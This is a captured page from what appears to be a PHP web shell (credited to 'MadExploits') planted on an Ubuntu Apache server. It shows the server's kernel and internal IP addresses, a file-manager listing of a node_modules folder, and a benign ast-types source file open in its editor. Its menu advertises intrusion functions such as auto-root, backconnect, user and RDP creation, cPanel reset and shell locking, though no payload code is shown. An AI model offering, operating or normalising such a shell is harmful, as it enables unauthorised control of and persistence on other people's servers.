Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
ast-types /
def /
[ HOME SHELL ]
Name
Size
Permission
Action
babel-core.d.ts
77
B
-rw-rw-r--
babel-core.js
9.84
KB
-rw-rw-r--
babel.d.ts
77
B
-rw-rw-r--
babel.js
397
B
-rw-rw-r--
core.d.ts
77
B
-rw-rw-r--
core.js
11.82
KB
-rw-rw-r--
es-proposals.d.ts
77
B
-rw-rw-r--
es-proposals.js
1.34
KB
-rw-rw-r--
es2020.d.ts
77
B
-rw-rw-r--
es2020.js
553
B
-rw-rw-r--
es6.d.ts
77
B
-rw-rw-r--
es6.js
9.48
KB
-rw-rw-r--
es7.d.ts
77
B
-rw-rw-r--
es7.js
1.33
KB
-rw-rw-r--
esprima.d.ts
77
B
-rw-rw-r--
esprima.js
2.03
KB
-rw-rw-r--
flow.d.ts
77
B
-rw-rw-r--
flow.js
11
KB
-rw-rw-r--
jsx.d.ts
77
B
-rw-rw-r--
jsx.js
4.56
KB
-rw-rw-r--
type-annotations.d.ts
256
B
-rw-rw-r--
type-annotations.js
1.86
KB
-rw-rw-r--
typescript.d.ts
77
B
-rw-rw-r--
typescript.js
14.89
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : type-annotations.js
"use strict";; /** * Type annotation defs shared between Flow and TypeScript. * These defs could not be defined in ./flow.ts or ./typescript.ts directly * because they use the same name. */ Object.defineProperty(exports, "__esModule", { value: true }); var tslib_1 = require("tslib"); var types_1 = tslib_1.__importDefault(require("../lib/types")); var shared_1 = tslib_1.__importDefault(require("../lib/shared")); function default_1(fork) { var types = fork.use(types_1.default); var def = types.Type.def; var or = types.Type.or; var defaults = fork.use(shared_1.default).defaults; var TypeAnnotation = or(def("TypeAnnotation"), def("TSTypeAnnotation"), null); var TypeParamDecl = or(def("TypeParameterDeclaration"), def("TSTypeParameterDeclaration"), null); def("Identifier") .field("typeAnnotation", TypeAnnotation, defaults["null"]); def("ObjectPattern") .field("typeAnnotation", TypeAnnotation, defaults["null"]); def("Function") .field("returnType", TypeAnnotation, defaults["null"]) .field("typeParameters", TypeParamDecl, defaults["null"]); def("ClassProperty") .build("key", "value", "typeAnnotation", "static") .field("value", or(def("Expression"), null)) .field("static", Boolean, defaults["false"]) .field("typeAnnotation", TypeAnnotation, defaults["null"]); ["ClassDeclaration", "ClassExpression", ].forEach(function (typeName) { def(typeName) .field("typeParameters", TypeParamDecl, defaults["null"]) .field("superTypeParameters", or(def("TypeParameterInstantiation"), def("TSTypeParameterInstantiation"), null), defaults["null"]) .field("implements", or([def("ClassImplements")], [def("TSExpressionWithTypeArguments")]), defaults.emptyArray); }); } exports.default = default_1; module.exports = exports["default"];
Close